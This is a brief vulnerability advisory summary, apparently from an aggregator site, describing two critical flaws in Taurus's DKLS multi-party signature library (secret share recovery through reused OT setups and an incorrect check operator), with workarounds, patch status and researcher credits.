2024-11-25
Platform:
Taurus Multi-Party Signature Library
Version:
Not specified
Vulnerability:
1. Secret Share Recovery Attack
2. Invalid Security Proof due to Incorrect Operator
Severity:
Critical (both vulnerabilities)
Date:
November 24, 2024
What Undercode Says:
This blog post by Taurus HQ acknowledges two critical vulnerabilities in their implementation of the DKLS protocol.
1. Secret Share Recovery Attack: Reusing the base OT setup allows a malicious participant to gradually extract and recover another participant’s secret entirely. This vulnerability contradicts existing comments within the code.
2. Invalid Security Proof: The 2018 DKLS paper contained a typographical error regarding the check value calculation in the OT extension protocol. This error was implemented in the code, rendering the security proof invalid. While no known exploits exist, the vulnerability undermines the protocol’s security guarantees.
Workarounds:
Do not reuse OT setups.
Avoid using the current DKLS implementation. Consider alternative solutions until a patch is available.
Patch Status:
A patch is under development (branch otfix) but not yet merged due to failing tests. Taurus HQ is actively troubleshooting the issue.
Credits:
Coinbase researchers Yi-Hsiu Chen and Samuel Ranellucci are credited for discovering and reporting these vulnerabilities. Yehuda Lindell is acknowledged for coordinating the disclosure process.
References:
Reported By: Github.com
Undercode AI: https://ai.undercodetesting.com
Image Source:
OpenAI: https://openai.com
Undercode AI DI v2: https://ai.undercode.help